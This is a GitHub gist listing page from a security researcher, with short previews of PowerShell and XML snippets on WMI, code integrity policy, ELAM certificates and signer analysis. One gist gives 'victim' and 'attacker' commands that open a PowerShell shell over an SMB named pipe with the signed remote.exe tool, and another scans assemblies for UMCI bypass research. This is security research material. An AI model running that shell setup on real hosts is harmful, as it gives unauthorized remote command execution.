Matt Graeber mattifestation
mattifestation
/ WMI_Module_BaseAddr_Enum.ps1
Last active
September 16, 2019 04:58
Enumerating module base addresses for a process using only WMI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Get-CimInstance -ClassName Win32_Process -Filter "ProcessID = $PID" -Property Handle | % { | |
| Get-CimInstance -ClassName CIM_ProcessExecutable -Filter "Dependent = 'Win32_Process.Handle=$($_.Handle)'" | |
| } |
mattifestation
/ ProcessMitigationOption.ps1
Created
October 21, 2016 21:22
Helper function for working with registry process mitigation options.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function ConvertTo-ProcessMitigationOption { | |
| [OutputType([String])] | |
| param ( | |
| [Switch] | |
| $DEPEnable, | |
| [Switch] | |
| $DEPATLThunkEnable, | |
| [Switch] |
mattifestation
/ gist:8ef36782ceb7f73d74cfb00c2a710301
Created
November 19, 2016 17:07
remote.exe - a useful, MS signed SMB shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Command to run on the victim | |
| # This will establish a PowerShell listener over the "pwnme" named pipe | |
| remote /S "powershell.exe" pwnme | |
| # Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client) | |
| runas /netonly /user:[Domain|Hostname\Username] "cmd" | |
| remote /C [Hostname\IP] "pwnme" |
mattifestation
/ NanoServerSetup.ps1
Last active
August 16, 2021 18:10
My setup steps to get Nano Server running on bare metal on my Intel NUC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #region Step #1 (optional): Salvaging of drivers | |
| # I had to manually install a disk and network driver the last time I installed Nano Server. | |
| # I saved my previous WIM file and exported the installed drivers using the Dism cmdlets. | |
| # These paths are specific to my system. | |
| # This was my old Nano Server TP5 image. | |
| $NanoTP5ImagePath = 'C:\Users\Matt\Desktop\Temp\NanoTP5Setup\NanoServerBin\NanoServer.wim' | |
| $WimTempMountDir = 'C:\Users\Matt\Desktop\TempMountDir' | |
| $ExportedDriverDir = 'C:\Users\Matt\Desktop\ExportedDrivers' |
mattifestation
/ NanoServerBareMetalCI.xml
Created
November 27, 2016 00:12
A working code integrity policy that I was able to deploy to my bare metal Nano Server install on my Intel NUC.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy"> | |
| <VersionEx>1.0.0.0</VersionEx> | |
| <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID> | |
| <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID> | |
| <Rules> | |
| <Rule> | |
| <Option>Enabled:Unsigned System Integrity Policy</Option> | |
| </Rule> | |
| <Rule> |
mattifestation
/ ELAM.ps1
Last active
July 27, 2022 09:37
ELAM driver approved anti-malware signer parser
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-ElamCertInfo { | |
| <# | |
| .SYNOPSIS | |
| Extract early launch anti-malware certificate information from an ELAM driver. | |
| Author: Matthew Graeber (@mattifestation) | |
| License: BSD 3-Clause | |
| .DESCRIPTION |
mattifestation
/ CertificateSubjectToPEGrouping.ps1
Created
December 25, 2016 16:04
Can you trust everything that's signed on your host? This might help you begin to answer that question.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get-SystemDriver requires the ConfigCI module on Win10 Enterprise | |
| # This will collect all signer information for all PEs in C:\ | |
| # This will take a while!!! | |
| $Signers = Get-SystemDriver -ScanPath C:\ -UserPEs | |
| # Associate the subject name of each certificate to the file/signer info | |
| # so we can correlate the two. | |
| $CertSubjectMapping = $Signers | % { | |
| $Signer = $_ |
mattifestation
/ LoadMethodScanner.ps1
Last active
April 8, 2025 14:47
A crude Load(byte[]) method scanner for UMCI bypass research
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Matthew Graeber (@mattifestation) | |
| # Load dnlib with Add-Type first | |
| # dnlib can be obtained here: https://github.com/0xd4d/dnlib | |
| # Example: ls C:\ -Recurse | Get-AssemblyLoadReference | |
| filter Get-AssemblyLoadReference { | |
| param ( | |
| [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] | |
| [Alias('FullName')] | |
| [String] | |
| [ValidateNotNullOrEmpty()] |
mattifestation
/ HashMismatch.ps1
Created
March 16, 2017 02:34
Why are CAT SHA1 hashes different than SHA1 hashes for PE files?
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Install-Module -Name PSScriptAnalyzer -RequiredVersion '1.11.0' -Force | |
| $ModuleInfo = Get-Module -ListAvailable -Name PSScriptAnalyzer | ? { $_.Version -eq '1.11.0' } | |
| $ModuleDir = Split-Path -Parent $ModuleInfo.Path | |
| # C:\Program Files\WindowsPowerShell\Modules\PSScriptAnalyzer\1.11.0 for me | |
| $NewtonsoftPath = "$ModuleDir\Newtonsoft.Json.dll" | |
| $ManifestPath = "$ModuleDir\PSScriptAnalyzer.psd1" | |
| # Requires Win 10 Enterprise to use the ConfigCI cmdlets | |
| $ModuleFileInfo = Get-SystemDriver -UserPEs -NoShadowCopy -ScanPath $ModuleDir -PathToCatroot $ModuleDir |
mattifestation
/ ConvertFromSID.ps1
Created
May 14, 2017 15:57
Example of filtering off the Win32_AccountSID association class to convert a SID->User using only WMI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function ConvertFrom-SID { | |
| param ( | |
| [Parameter(Position = 0, Mandatory = $True)] | |
| [String] | |
| [ValidateNotNullOrEmpty()] | |
| $SID | |
| ) | |
| $AccountSIDInstance = Get-CimInstance -ClassName Win32_AccountSID -Filter "Setting = 'Win32_SID.SID=`"$SID`"'" |